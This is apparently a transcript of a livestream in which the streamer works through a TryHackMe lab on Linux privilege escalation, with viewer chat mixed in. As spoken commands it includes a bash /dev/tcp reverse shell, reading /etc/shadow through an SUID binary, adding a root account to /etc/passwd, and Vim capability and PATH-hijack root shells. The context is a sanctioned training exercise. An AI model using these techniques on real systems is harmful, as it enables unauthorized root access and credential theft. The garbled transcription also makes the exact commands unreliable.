So let's exit. Oh shit, I needed to end the box as well. Do that before I forget. Put it in chat earlier, didn't I? Let's grab that. Terminate. Yeah, look at that, we're on the under the 10k rankings now. Pretty scary because I'm not that good. Alright, exit, clear, dot dot, and make the linpriv-esque linps cd. Cool, so learn the fundamentals of Linux privilege escalation. From enumeration to exploitation, get hands-on with over 8 different privilege escalation techniques. Let's update our Twitch info as well. So, privilege escalation is a journey. There's no silver bullet. Much depends on the specific configuration of the target system. The kernel version, the installed application, supported programming language, and other users' passwords are a few key elements that will affect your road to a root shell. This run was designed to cover the main privilege escalation vectors and give you a better understanding of the process. This new skill will be an essential part of your arsenal whether you're participating in CTFs, taking certification exams, or working as a pen tester. What is privilege escalation? At its core, privilege escalation involves going from a lower permission account to a higher permission one. More technically, it's the exploitation of a vulnerability, design flaw, or a configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from the users. Why is this important? It's rare when performing a real-world penetration test that you'll be able to gain a foothold, the initial access that gives you direct administrative access. Privilege escalation is crucial because it lets you gain system administrator level of access, which allows you to perform actions such as resetting the passwords, bypassing access controls to compromise protected data, editing software configurations, enabling persistence, changing the privilege of an existing or new user, execute any administrative commands. Enumeration. Let's start the box. Oh shit, here we go. Split screen. Launch the target machine attached to the task to follow along. You can launch the target machine and access it directly from your browser. Alternatively, you can access it over SSH with the low privilege user credential below. Enumeration is the first step that you have to take once you gain access to a system. You may have accessed the system by exploiting a critical vulnerability that resulted in a root level access, or you've just found a way to send commands using a low privileged account. Penetration testing engagements, unlike CTF machines, don't end as soon as you gain access to the specific system or a user privilege level. As we'll see, enumeration is as important during the post-compromise phase as it was before. The hostname command will return the hostname of the target machine, although its value can easily be changed or have a relatively meaningless string. In some cases, it can provide information about the target system's role within the corporate network, SQL prod1 for example, in a production server. Uname-A will print a system information giving us additional detail about the kernel used by the system. It's useful when searching for any potential kernel vulnerabilities that could lead to privilege escalation. The proc file system procfs provides information about the target system processes. You'll find proc in many different Linux flavors, making it an essential tool to have in your arsenal. Looking at proc/version may give you information from the kernel version and additional data such as whether a compiler GCC is installed. etc issue. Systems can also be identified by looking at etc issue file. This file usually contains some information about the operating system but can be easily customized or changed. While on the subject, any file containing system information can be customized or changed for a clearer understanding of the system. So it's good to look at all of these. The ps command is an effective way to see the running processes. Typing ps on your terminal will show the process of the current shell. The output of the ps process status command will show the following: PID, the process ID, TTY, the terminal type, the time, the amount of CPU time used by the process, CMD, the command or executable running.
Laren says,
Hey Laren, what's up? How are you doing? Give a shout out. Not got any clips. Let's give Just a Guy a shout out as well. Not got any clips either. Okay. We'll have some shout outs anyway. I'm actually going to run this in SSH. So Karen at 10.10.67.228. Yes, password is password1.
Laren says,
Ingo, pretty happy that I was able to finish Overpass on THM completely on my own. Really
amazing.
It was pretty cool.
Is that which Overpass? Is that the first one?
Also, I finished a couple other machines on my own.
Nice, mate. It's a good feeling, isn't it, when you can do them without all the walkthroughs and like needing all the extra guides.
Yeah, I think it was the first one.
I think if you do, there's 3. If you do all 3, then there's a badge you can get. So that might be worth doing the next couple. Where was I? So env will show the environment variables. The path variable may have a compiler or scripting language that could be used to run code on the target. Sudo L lists who are sudo. ls list the common is one of the common commands for listing the directories.
Oh yeah, gotta have a look at those.
Yeah, do it. It's definitely in the path. There's a where is it? Try hack me. So if you go, where is it? Activities, practice, and then one of the series, Overpass. Yeah, so there's 2, 3, yeah. So yeah, if you do all 3, you get the Overpass badge. You've still got to do the 3rd one, so. Second one's good. So ID will provide general overview of the user's privilege level and group membership. Also worth remembering that the ID command can be used to obtain the same information for another user as seen below. Reading etc password can be an easy way to discover users on the system. While the output can be long and intimidating, it can be easily cut and converted into a useful list of brute force attacks. Oh, that's cheeky. Let's save that one. Where's the... Stick it at the bottom. Type it to cat. D. Turns etc password to word list. Remember, this will also return all users, some of which are system or service users that won't be very useful. Another approach could be to grep home, as real users will most likely have their folder under the home directory. Looking at earlier commands with history command can give us an idea about the target system a bit, and albeit rarely have stored information such as passwords or usernames. config gives you the network interfaces. This can be confirmed using the IP root command. See which network routes exist. Netstat shows you the existing interfaces and network routes. Can also be used with the -L option to list any listening ports. Cool. And then find. Yeah, we've already used this already. So we can find files on the system. And folders. So, as we're in the Linux realm, familiarity with Linux commands in general is very useful. Please spend some time getting comfortable with find, locate, grep, cut, store, etc. What is the host name of the target system? So, Wade 37363. What is the Linux kernel version for the target system? This was something -A. Uname -A. So, what Linux is this? It's Ubuntu. What's this bit going to be? It's Ubuntu, but what the fuck is that? Weird. Which Python Python can't type today. Python v 2.7.6. Oh, it's going to annoy me, that Linux one.
Uname R?
Uname R. I got to X out of Python. Yeah, that doesn't look right. Just Uname. Linux. Really? You... all. Oh, we did all, didn't we? Yeah, weird. Ubuntu something something dot something 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 something. It's not even like 2.13 because there's an extra digit there. This could be x64. Don't know. Why don't you just try version, I guess. Uname version, let's see what this prints. No, that doesn't help. Print the operating system. Uname-o. GNU Linux. No, strange. It's got to be something. We'll come back to that one. What vulnerability seems to affect the kernel of the target system? So let's have a look. Let's try again. Exploit database. Filter. Not just put the target. Overlay JS. Not JS, FS. Enter the CVE number. Could be that one. Right. So the lower version. Yeah, there we go. Oh, what the fuck is that one going to be? No, don't that. We want the. This is a completely different one, isn't it? these. I want the fucking... Here we go. Come on, internet. What Linux is this? Oh, they want that. Like, fuck's sake. They want the Ubuntu version number, even though it's like from the, you have to reverse it from the kernel. Oh yeah, makes sense now. So yeah, Ubuntu. You put the generic in. Then it lets you figure out the release number. Oh, okay, that was dumb. Well, not really from my part, but just fucking stupid that they want you to figure that out. Like, rather than just taking what you can glean from this. Ubuntu 14.04 LTS. Right, automated enumeration tools. Several tools can help save time during enumeration. These tools should only be used to save time, knowing that you may miss some privilege escalation vectors. Below is a list of popular enum tools, links to their respective GitHub. The target system's environment will influence the tool you use. You will not be able to run tools written in Python if it's not installed. This is why it would be better to be familiar with a few rather than having a single go-to tool. We've got linps, let's copy that. I don't know if I've got a prives category. No, I need one. Yes, let's start one. Install and try a few automated enums on your local Linux. Yeah, that's right, we've already done linp, so I'm not doing that again. Should have it in my downloads. Linps, there it is. So we got it already. We didn't actually do like much enumeration on this. We just like you named it a couple of times and then you're done. So the next one. Launch a target machine. You can connect using the credentials again. It's going to be different this time. Privilege escalation ideally leads to a root privilege. This can sometimes be achieved simply by exploiting an existing vulnerability, or in some cases by accessing another user account that has more privilege. Unless the single vuln leads to a root shell, the privilege escalation process will rely on misconfigurations and lacks permissions. Kernel on Linux system manages the communication between components such as memory on the system and applications. Critical function requires the kernel to have specific privileges. Thus, a successful exploit will potentially lead to root privileges. The kernel exploit methodology is simple. Identify the kernel version, search and find an exploit, and then run the exploit. Although it looks simple, please remember that a failed kernel exploit can lead to a system crash. Make sure that this potential outcome is acceptable within the scope of your penetration testing engagement before attempting a kernel exploit. Based on your findings, you can use Google to search for an existing exploit code. Sources such as Linux kernel CVEs can also be useful. Another alternative would be to use a script like LES, but remember that these tools can generate a false positive, report a kernel vulnerability that does not affect the target system, or a false negative, does not report any kernel vulnerabilities even though it is vulnerable. Being too specific about the kernel version when searching for exploits in Google, ExploitDB or Searchsploit. Be sure to understand how your exploit code works before you launch it. Some exploit code can make changes on the operating system that would make them unsecured in further use, or make irreversible changes to the system, creating problems later. Of course, these may not be great concerns within a lab or a CTF environment, but these are absolutely no-nos during a real penetration testing engagement. Some exploits may require further interaction once they're run. Read all comments and instructions provided with the exploit code. You can transfer the exploit code from your machine to the target system using the simple HTTP server Python module and wget respectively. Find and use an appropriate kernel version to gain root on the target system. Right. In that case then, we're going to need password 1 capital P, isn't it? So we've got 130.86. Yes. Password 1. So, should we just... We can identify the kernel again, so uname-a. So let's hope it's a nice easy .0. We've got another overlay JS FS. So anything between these versions, we've got a local privilege escalation, so we can download U, save it in Linux privesc. What's it doing? It's doing lots of things. I can't really read C, so this is going to go well. Right, let's split terminal. This is a different room, isn't it? Lin priv s, that's what I wanted. So you've got nothing in you. Put you in there, right? Right. So if we do Python server, we'll get 10.9.12.198 37292.c. Cannot write. Okay, cd So we're in temp now, so 12198 7292C. So let's give it execute. .c. Oh, that didn't work. Gotta build it. Overlay FS. This is so slow. I'm gonna get all 4 of these and just stick them all in one place. Alright, so let's try that again. RM. Get HTTP 10.10.130 6. What do they call it? OFS 32. Oh, I did the wrong sodding one. We'll get HTTP 10.9.12.198 OFS 32. And I'll grab the 64 one just in case. Change mod plus X this. Hey, now I've got root. Cool. And the music stopped. Play again. So we've got root privileges. What is the content of the flag.txt? So we should now be able to do root. What? CD mat. Cat flag 1.txt. There we go. Cool. And we're done with that room. We've got another one. So let's start this one. While that boots up, I'm actually going to... where's my documents? THM, PrivS. I'm going to take those, put them in downloads. Overlay FS, that's what I wanted. Just so I've got that in my bag. Alright, we up? Yes, we're up. So we can SSH Karen again. This time 93.114. Yes. Password 1. I was thinking about it. There we go. So, sudo command by default allows you to run a program with root privileges. Under some conditions, administrators may need to give regular users the flexibility on their privileges. A junior SOC analyst may need to use Nmap regularly, but would not be cleared for full root access. In this situation, the system administrator can allow a user to run Nmap with root, while keeping their regular privilege level for the rest of the time on their system. Any user can check its current situation related to root using the sudo-l command. GTFO bins is a valuable source that provides information on how any program which you may have sudo rights on can be used. We can leverage application functions. Some applications will have a known exploit within this context, such as an application may see as Apache 2. In this case, we can use a hack to leak the information leveraging a function of the application. You can see below Apache 2 has an option that supports loading alternative configuration files -f and specify an alternate server config. Loading the etc shadow file using this option will result in an error message that includes the first line of the etc shadow file. Leverage LD preload. On some systems you may see LD preload option. This is a function that allows any program to use a shared library. This blog post will give you an idea about the capabilities of LD preload. If the env-keep option is enabled, we can generate a shared library which will be loaded and executed before the program is run. Please note that the LD preload option will be ignored if the real user ID is different from the effective user ID. The steps of this privilege escalation vector can be summarized as follows. Check if LD preload exists. Write a C code compiled as a share object. Write the program with sudo writes. Run the program with sudo and the LD preload option pointing to our SO file. This C code will spawn a root shell which can be written as follows. We gave this code as shell C and compile it using GCC. Using the following parameter, we can now use the shared object within the shared object file when launching any program our user can run with sudo, in our case Apache 2. Find or almost any program we can run with sudo can be used. We need to run the program by specifying LD preload option as follows. Sudo LD preload shell so find. This will result in a shell spawn with root privilege. I wonder which one of those it's going to get us to do. So, how many programs can the user Karen run on the target system with sudo? 3. What's the content of flag2.txt? That was easy. You got to log in. How would you use Nmap to spawn a root shell if you were... How would you use Nmap to spawn a root shell if you had a user that had sudo on Nmap? This is in this, so if we go GTFO, Nmap, sudo, do Nmap interactive. And then what is the hash of Frank's password? What is the password? It's password 1. What? I thought she had Nmap. Oh, I guess she doesn't have Nmap. So what have we got? I think Les has one, doesn't it? So if we've got sudo, we can do sudo les etc profile. We want Frank. Okay. So then we can do cd home ls. Okay, we can cat etc shadow, and then we can get Frank's Cracks hash. Terminate that one. Start the next one. If anyone wants to do this room, it's this one. So if you want to follow along or catch up, that's the room we're doing.
Sec says, web link.
Alright, 30 seconds left. So this one instead is much of the Linux privilege control rely on controlling the users and file interactions. This is done with permissions. By now you would know that files have a read, write, execute permission. These are given to users within their privilege levels. This changes with SUID and SGID. These allow files to be executed with the permission level of the file owner or the group owner respectively. You will notice that these files have an S bit set showing their special permission level. This will list files that have a UID or an SGID set. I think I've got this saved already. I should have a SUID check. Yeah, there we go. Alright, so we're up. So SSH Karen at 10.10.231.104. So a good practice would be to compare the executables on this list within GTFO bins. Clicking on the SUID button will filter binaries to known to be exploitable when the SUID bit is set. You can use this link for a pre-filtered list. The list above shows that Nano has this SUID bit set. Unfortunately, GTFO bins does not provide us with an easy win. Typical to real-life privilege escalation scenarios, we'll need to find intermediate steps that will help us leverage whatever minuscule finding we have. The SUID bit set for the Nano text editor allows us to create, edit, read files with the owner's privileges. Nano is owned by root, which probably means that we can read and write at a higher level of privilege than our current user has. At this stage, we have two basic options for PrivResc: reading etc shadow or adding our user to etc password. Below are simple steps using both vectors. Reading the etc shadow file, we can see that the Nano text editor has the SUID bit set by running this, so let's run that. There's all kinds of shit coming through there. So we go back up. SUID. So we should see, where was it? Key sign, whole kit, U mount, SU mount. Mount, ping, U mount. RSWD, sudo, ping, SU. SS. We're not seeing that. What's the... Nano text editor has the SUID bit set. Why isn't it in the list? Weird. Let's just run it again. Still not there. Right, fine, let's just read on. If it's not there, I can't fucking do it. So if we saw that Nano text editor had the SUID bit set. Nano etc shadow will print the contents of shadow. We can now use the unshadow tool to create a file crackable by John the Ripper. To achieve this, unshadow needs both etc shadow and etc password. The unshadow tool usage can be seen below. Unshadow. Let's take a copy of that while I've got it anyway. Right, and then with the correct word list and a little luck, John the Ripper can return one of the several passwords in clear text. For a more detailed room on John the Ripper, you can visit here. The other option would be to add a new user that has root privileges. This would help us circumvent the tedious process of password cracking. Below is an easy way to do it. You'll need the hash value of the password we want the new user to have. This can be done quickly using OpenSSL tool. Let's stick that down there as well. OpenSSL SWD. Is that one? It's salt. THN password 1. So that gets you the hash. You then add this password with a username to etc password file. And then 00 root gives you access as a root user. Let's add that to my thing as well. Where'd that go? Do hacker. Zero root bin bash. So which user shares the same name as a great comic book writer? It's not Karen. Jerry Conway, I guess. What is the password of user 2? Where are we going to find that out? I take it we can nano this file. I'm not gonna. Yeah, so I need to get Privesk first. Password 1. Karen is not in sudo as far, okay. I'm just supposed to brute force it? It seems a bit dumb. Or should we find something else that is exploitable? So what have we got? It's not mount, it's not ping. It's umount, that it. Bash
Kusaman
64.
says,
Bash 64.
Base 64. Is that one of the ones? Oh yeah, good shout. So for this one, we just do this binary has SUID bit set. It does not drop out of elevated privileges and may be abused. This example creates a local SUID copy of the binary and runs it to maintain elevated privilege. Interact with the binary. Skip the first command.
South.
translated from Afrikaans.
Suoud. So we can skip the first bit and just do. We got So base 64 shadow. Decode. No. You have to do it with the L file. L file. I guess you got sudo actually. Sudo base 64 L file base 64 decode password. What?
No man, not sudo.
Not sudo. Oh, it's still not working. Base 64. Base, maybe without this shit. Base 64.
Go bin bash.
There we go, got it. Didn't like the // So let's go back so we can read. We can read user 2. So user 2, there's your hash. I'm hoping this is in CrackStation.
Nice.
Come on, CrackStation. You're not a robot. Unrecognized hash format. Last hash.
Jana.
Yeah, I think we'll do it. First one. Echo. And then what's the... Didn't like that. Loaded one hash, so got the hash right. Is it just off screen? Is that right? No.
Copy
Copy
one
in
more
there.
hash.
Yeah, let's do it again. See what I probably butchered the hash. THN. Ditch that bit. Let's try again. That's better. Password 1.
Little
No.
man.
Yeah, I should have just guessed that. Right, so I guess should we just print it out again? Just do we could do SU user 2 password 1 and ls cd /home cd ubuntu flag 3. There we go. So cat flag 3 txt. Oh, you dick. So that's where it is. Let's just do this again to read it. So L file equals. We have to do the whole thing. Home Ubuntu flag 3 txt. Yay. Cool. Next one. So another method system administrators can use to increase their privilege level is capabilities. Capabilities help manage privileges at a more granular level. For example, if the SOC analyst needs to use a tool that needs to initiate socket connections, a regular user would not be able to do that. If the system administrator does not want to give this higher user privilege, they can change the capabilities of the binary. As such, the binary would get through its task without needing a higher privileged user. The capabilities man page provides detailed information on its usage and options. We can use the get cap tool to list enabled capabilities. When run as an unprivileged user, get cap -r / will generate a huge amount of errors. It's a good practice to redirect it to null. Please note that neither Vim nor its copy has the SUID bit set. The privilege escalation vector is therefore not discoverable when enumerating files looking for an SUID. GTFO-bins has a good list of binaries that can be leveraged for privilege escalation if we find any set capability. We notice that Vim can be used with the following command and payload. This will launch a root shell as seen below. So complete the task described above on the target system. .196.37. So what was that command? You got get cap -r /. Just going to let it generate errors so I can see what it does. Oh god, instant regret. Attack. So, what have we got? G-Streamer. Hackman. MS Cannon. What the hell? G-Stream HB Sal... How do I say that? Salman... No. Right, there it goes. Got Vim.
Kovsamansk says,
HB Salmansk.
translated from Dutch.
HB Salmansk. So we need GTF Ogans again. Vim. Capabilities. So if we've got capabilities, we do
Check them.
check. Not found. So if the binary has cap set UID set or is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access. This requires that Vim is compiled with Python support. Prepend Py3 for Python 3. So we do /vim c py import os dot set uid 0 os dot exec l bin bash bin shell dash c reset ex exec share. Did that work?
Nightbot says,
You can change your TDS voice here. Web link.
The command is not available in this version. Let's try it with Py3 then. Duff Shell as well, so it's
8 subscribers to go until we reach the goal of 15 and unlock new emote slots. Use those Prime subs if you have them.
my VM doing that fucking bullshit it's doing before, like not letting me click one half of the screen. Yes. I hate when it does this. I still don't know what causes this. It just like won't let you interact with any part of the screen apart from like here onwards. Right, that's better. So work with Python 3. Alright, you're going to let me full screen you and you're going to behave. On the wrong fucking monitor. No, you're not. Fuck's sake. Right, let's just work with this side of the screen. Right, that should have fixed it. Yes. Although it's disconnected. Yeah, the only way I can fix that is by like completely logging out and logging in again. And then it magically works. It's so frustrating. Right, so let's go back to where we were. So it was 10:37. Come on. Not on the VPN. Really? Right. better. Password. Right. Right, where were we at? So I had a command that got me root. Let's pop that back in. So we completed that task. How many binaries have the set capabilities? We did have that as well. Get cap. R. To. Live. No.
Christy says,
Peepo, happy tea time.
Peepo, happy tea. So how's it going, Christy? So we've got 1, 2, 3, 4, 5, 6.
Hello.
Let's give you a shout out as well.
I'm tired as FK love.
Tired as fuck.
Christy says,
How you doing?
Come in, Kaito-san. Are you getting close yet?
Yep, right by the Don Quixote.
Are you getting close yet? Yeah, I was knackered yesterday. I literally just went to bed straight away. Had a nap. Speaking of, it's getting pretty dark now. So what other binary can be used through capabilities? So this, we're going to need this again. Capabilities. So view. What box? We're doing this one.
Sex says, web link.
Yeah, we got this room and then one more for Windows Privesk, and we're done with the whole junior penetration tester course. So I'll get my certificate.
Christy says,
RK. RIC.
Yeah. So,
Nice.
so this was view. What was the content of flag 4? So where the hell is flag 4? Why can't I type? E? There we go, it's working up. Where are we at? Vim, CD, home, ls, CD, Ubuntu, yes, cat, flag 14. There we go. So that's that room. Well, that section of the room anyway. So terminate. Cron jobs. So we want run. Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privileges of the owner and not the current user. While While properly configured cron jobs are not inherently vulnerable, they provide privilege escalation vector under some conditions. The idea is quite simple, that if there is a scheduled task that runs with root, we can change the script that is run and then run our own scripts with root privileges. Cron job configurations are stored as cron tabs, cron tables, to see what the next time and date the task will run. Each user on the system will have their cron tab file and can run specific tasks whether they're logged in or not. As you can expect, our goal will be to find a cron job set by root and have it run our scripts. Any user can read the file keeping system-wide cron jobs under etc cron tab, while CTF machines can have cron jobs running every minute or every 5 minutes. You more often see tasks that run daily, weekly or monthly in penetration test engagements. You can see the backup.sh script was configured to run every minute. The content of the file shows a simple script that creates a backup of the prices.xls file. As our current user, we can access this script. We can easily modify it to create a reverse shell, hopefully with root. The script will use the tools available on the target system to launch the reverse shell. 2 points of note: the command syntax will vary depending on the available tooling. NCAT will probably not support the -E option. You may have been used in other cases. We should always prefer to start reverse shells, as we do not want to compromise the system integrity during a real penetration test engagement. The file should look like this, which will now run a listener on our attack machine to receive the incoming connection. Cron tab is always worth checking, as it can sometimes lead to an easy privilege escalation. The following scenario is not uncommon in companies that do not have certain cybersecurity maturity level. The system administrator needs to run a script at regular intervals. They'll create a cron job to do this. After a while, the script becomes useless and they delete it. They do not clean up the relevant cron job. The change management issue leads to potential exploit leveraging a cron job. The example above shows a similar situation where the antivirus.sh script was deleted. Cron job still exists if the full path of the script was not defined as it was done for the backup shell script. Cron will refer to the paths listed under the path variable. In this case, we should be able to create a script named antivirus.sh under our user's home folder, and it should be run by the cron job. The incoming reverse shell has root privilege. In the odd event that you find an existing script or task attached to a cron job, it's always worth spending time to understand the function of the script. Any tools used within the context, for example tar, 7-zip, rsync, etc., can all be exploited using their wildcard feature. How many user-defined cron jobs can you see on the target system? I will tell you as soon as I've logged into it. Karen 19248. I love how every one of these songs I've got's on shuffle, and it's just Zelda and chill, Zelda and chill, Zelda and chill. Like, right, so Alright, there we go. So what have we got? How many user-defined cron jobs have we got? Root. The one, I guess. So 0. 2. Oh, right, so we don't care that there's runner's root, it's just it is user defined. What is the content of flag5.txt? So we need to set
0.
yeah, that's what I thought. It's like because they're all root. Right, so we want to which user? I mean, that's. Oh, this SSH is really slow. Right. Wake up.
Isn't like crontab u $user L. Or some shit.
Probably. Why isn't this reacting now? What the fuck? Let's try and log in again. SSH Karen 248. Don't tell me the box has died already, for Christ's sake. Still on the VPN. Yeah. Honestly, some of these boxes are so turd.
Box is deeded. Yep.
Yeah. Again, it's a sub room. Like, it's just not acceptable. What's the point of subscribing when the room... Well, I've managed to do the first 8 tasks, but still. It's not exactly the best user experience when, like, one of those rooms doesn't function. And now I've got to change my IP just to fucking use it. Another Zelda and chill box. Mega Man.
Kavsamansk says,
I love PG Room, romantic face.
PG room, which one's that? Two, 2, 4. 2, 8. Come on. etc cron tab. It's fucked again, what the hell? This is really turd. Let's just copy that.
PG to Proving Grounds OSCP.
Oh, cool. Wake up! Right, I'm not going to run that cron tab again because I've got it here. Use the attack box. It still shouldn't be breaking.
Use the attack box.
We'll do that next if it does it again, because I'm hoping if I don't cat the cron tab it will just be fine. The only thing we need to do is edit one of these scripts. I'm guessing the Karen one that we've got. We will definitely have access to that one. Probably any of them, I doubt it matters. So we edit one of those, stick a reverse shell in, so let's grab one of those as well. Are we back up yet? Yeah, we are. So SSH 2062. How is this slow? Just fucking logging in. I've only got one box as well. I keep terminating the ones that we finished. Like, it's not like I'm being a dick to try hack me. Thank you for the follow, OB? How the hell do I say that?
Samansk says.
Try attack box.
OBLTS.
Christy says.
Well, old boxes have this problem.
Right, yeah, let's do it with the attack box. So we're in. Yeah, at least we can type on this one. Can you actually see that? No, my head's in the way. So if we, where are we at? So backup.shell, so got nano, backup. So we'll edit it. Some ampersand, there we go. Dev TCP 10.9.12.8 4444 0 1. So now we just wait. That does have Netcat. I don't know how long we're going to have to wait for it.
We do be waiting.
Check I can ping myself. 10, 12, 1, 9, 8. Yeah, so. We could sanity check it and just. We'll get a low privilege shell back. Doesn't look like it. Let's try something else.
Kavsamansk says,
Use your tree hack Mkali.
Yeah, it could do, but I. Let's just copy their one. What's the one they had? Bash I dev TCP 10.9.12.1.
Nightbot says,
You can change your TDS voice here.
4 0 1. Alright, so that works. So let's try.
Kavsamansk says,
Nice.
So if we nano that back up again, and then just change the payload. So
Nightbot says,
8 subscribers to go until we reach the goal of 15 and unlock new emote slots. Use those Prime subs if you have them.
Right, so now we just wait again, but at least we know that payload works. Oh, how's everyone's day been? How's Friday treating you? Need to go drink. Anyone got plans for the weekend?
Christy says,
Friday gone. 1 a.m. here, boy.
Oh, okay. Shit. Yeah, we've only got another hour left here. So. Got 1 a.m. That's dedication. Still not seeing this start. What if we do the same to these other files as well? If we check out the
Yeah, I'm trying to execute a LNK file and my VMS is stubborn ATM.
I'll find antivirus shell.
Kavsamansk says,
4:03 a.m. man.
So temp temp's got a load of shit in it, but not a temp test pi isn't there. Guess we could add a test pi, so touch test.pi. You see, no, you can't see it because it's it's like here where I'm typing. Tell you what, let's just reverse shell. I'll do it on this side, and then split horizontally. I'll get my root shell down the bottom.
Christy says,
Oh, why you no sleeping, Sarmansk?
4 a.m. Jesus. Go to bed. I'm not that interesting.
Kavsamansk says,
You're writing.
I am writing.
Hey. So instead of this, so now we've got test pi. If we nano test pi, we've got to put a Python script in here. So that's my rev shell. Python.
Christy says.
Python 3.
Yeah, good shout. Actually, could be anything.
K.
Oh, I just crashed. Oh, I didn't crash yet. I lost my shell. Like a noob. We broke the box. Again. Doesn't like this cron job one, does it?
Kavsamansk says.
Discord.
I do have a Discord, but I don't really use it, or at least not yet. Let's share the link to it. Yeah, I don't. I've got like literally just the basic rooms and nothing else. So if you can enter the MSEC dungeon or MSEX dungeon. Where the fuck is that? Oh, there we go, invite. So there you go. I will do some more with it, but yeah, at the moment there ain't much there.
Sex says. Web link.
Are we up yet? No. I'm just going to check a walkthrough for this task if I'm barking up the wrong tree with that Python one.
Christy says.
Task we on 9 cron job. Oh, awesome! It doesn't even fucking tell you. Run cron tab. We can see there are 4 cron tabs. Yes. So which one do you edit? It doesn't say. Follow the task notes to find the flag. That's exactly what we did. Nano backup.shell. 12 198 4444 0 greater than amp1. Right, and then etc cron tab. It looks like all of these are starred, so maybe they're not actually running. Cron tab, change time. Cron tab.e, you can edit.
Kavsamansk says,
You want more try SSH?
No, I'm gonna just do it with the side one. At least that one's a bit more stable. So we should have cron tab -e. Select an editor.
Christy says,
Check which ones are under Karen Toe.
Yes. Cron tab -L. No cron tab for Karen. What? Do I just edit nano etc cron tab? Just fucking change the font. No, I can't write to it. Arrgh. Can't touch antivirus. Temp test.py nano test.py don't get a copy paste, do we now? Yeah, you bastard. Bad FD number, what are you on about? Bash I dev TCP 10.9.12.198.444 0 AMP1. Bad FD number. Oh, this thing's fucking stupid. Oh, for fuck, this isn't even doing anything. All it has to do is run that. Can't even ping my box again. Oh, for Christ's sake, this is doing my nut. What's not working? The backup script is now not running bash. So it's not doing anything. And then if I try to ping my own attack box, so 10.9.12.198, it doesn't even ping. Go the other way.
Kovsalmansk says,
Reset box.
Yeah, I mean, I've reset it like 10 times now. I can just do one at this point and I'll move on. Yeah, whatever. We'll do that one off stream.
Christy says,
Is that script ran by root as well?
Yeah, all four of them are. But, the first two don't exist. They've been deleted. The one on the Karen account we changed, and then I added one to the Python one. There's like a temp file that was deleted, so I created it again. And yeah, nothing works. So, fuck you, Crontab, essentially. We'll come back and do that one with a less flaky box.
Crazy.
Right, next. Path. In a folder, if a folder for which your user has write permission is located in the path, you can potentially hijack an application to run a script. Path in Linux is an environmental variable that tells the OS where to search for executables. It's for any command that is not built into the shell or is not defined with an absolute path. Linux will start searching for folders defined under path. Typically the path will look like this. So if we echo, where's my dollar? Dollar, path. If we type thm into the command line, these are the locations Linux will look for, an executable called thm. The scenario below will give you a better idea of how this can be leveraged to increase our privilege level. As you see, this depends entirely on the existing configuration of the target system, so be sure that you can answer the questions below before trying this. What folders are located under path? Does your current user have write privileges to any folder? Can you modify the path? Is there a script or application you can start that will be affected by the vulnerability? For demo purposes, we'll use the script below. This script tries to launch a system binary called thm, but the example can be easily replicated with any binary. We compile this into an executable and set the SUID bit. Our user now has access to the path script with an SUID bit set. Once the executed path will look for an executable named thm inside folders listed under path. If any writable folder is listed under path, we could create a binary named thm under that directory and have our path script run it. As the SUID bit is set, this binary will run with root. A simple search for writable folders can be done using the find writable dev null. Find writable. The output of this command can be cleansed using a simple cut and sort sequence. Guess I might as well add that as well. So we pipe that into cut d f2 sort e. Some CTF scenarios can present different folders, but a regular system would output something like we see above. Comparing this with path will help us find folders we could use. We see a number of folders under user, thus it could be easier to run our writable folder search once more to cover subfolders. An alternative could be the command below. Stick you in there as well. We've added grep v proc to get rid of many results related to running processes. Unfortunately, subfolders under user are not writable. The folder that will be easier to write to is probably tmp. At this point, because tmp is not present in path, we'll need to add it to the path. The export path tmp path command accomplishes this. At this point, the path script will also look under the temp folder for an executable named tmp. Creating this command is fairly easy by copying bin bash as thm under the tmp folder. We have given the executable rights of our copy of bin bash. Please note at this point it will run with our user's right. What makes a privilege escalation possible within this context is that the path script runs with root privileges. So what is the odd folder you have write access for? SSH Karen 30.180. This is still so slow, I don't get it. Don't even get the option to get the split screen anymore. What the fuck?
Same box.
Well, a different box, but in the same room. Doesn't. Yeah, there's no split screen.
H8 Handles says,
How is stream bug?
Hey! How you doing, Hate Handles? Stream's going good. Just the Try Hack Me box that's being a piece of shit at the moment. Not got any clips.
H8 Handles says,
Getting ready to go live and there's a massive shocker.
A massive shocker? What's that? Connection closed, of course. There we go. What's your massive shock?
Tree hacking being a piece of shit.
Oh, I
is a
got you,
shocker.
got you. Yeah, it's being a bit more flaky than usual today. Right, let's find some writable files, please, before it crashes again. Okay. What odd folder do we have write access for? Oh, Murdoch? Why can I write into someone else's folder? That's not good. Yeah. Exploit the path vulnerability to read the content of flag 6 txt. So, let's see what the path is.
Nightbot says,
You can change your TDS voice here. Web link.
So there's no editable ones. I'm guessing we can edit paths, so let's just do another export path equals DMP path. Cool, so now TMP's there. And it's fucking crashed. Fantastic. 3 seconds in. Fuck's sake.
Eight subscribers to go until we reach the goal of 15 and unlock new emote slots. Use those Prime subs if you have them.
Kavsamansk says,
I am sleepy. I am sorry. Talk will be Discord. I am going. 4:29 AM.
No worries, dude. Like I said, go to bed. It's far too late to be staying on chatting to me. Good night, mate.
Christy says,
Jin Hubsamansk.
translated from Portuguese.
$180. SSH just doesn't work now. Well, this is what should happen, is that I should echo bin bash into like this.
H8 Handles says,
So the box is being a Karen?
Christy says,
Told you is same
Yeah.
box.
The box is being a Karen and the user they give you is called Karen. Like, ironic.
Kavsamansk says,
My time, good morning. Sunrise over mountains.
Yeah, the sunrise will be rising over the mountains in a minute. Oh, what a piece of shit. I only wanted to finish this today and do the Windows one. The only reason I've had to slow down and, basically stop now is because the cron job thing doesn't work. And then this path doesn't work.
Okay, I am writing.
Christy says,
Good morning, Sarmansk. Imagine Windows one toe.
Probably even worse.
If this Linux one is crap,
Yeah. I think I might end it here if this is not going to be plain bull. Let's just terminate you. You can stop. I'll try that again tomorrow. But yeah, I'm going to stream again tomorrow morning. Hopefully finish this room off and then finish the Windows box, because I'd like to get that junior pen tester completed. And then I'm going meeting some friends. So I'm not going to be doing any Kirby, you'll be pleased to hear. But I'm off work the whole of next week, so I'm going to be streaming a bit more during the day to do, I don't know, probably some gaming or something just to chill out, seeing as I'm not working. So yeah, you'll see a lot more of me this week. Let's find someone to raid.
Noise.
Ah, Tiberius is on. What's he doing?
Okay.
Hackbox. Cool. Alright, I'll send you all over to Tiberius. But yeah, that'll be it. I can't be bothered to do any more of this one if it's not going to work. We'll do it when it is working tomorrow, hopefully. And yeah. Yeah, I'm going to finish this off. I've only got literally one more room. That's what's so annoying, is that we could have done this whole thing tonight.
No worries.
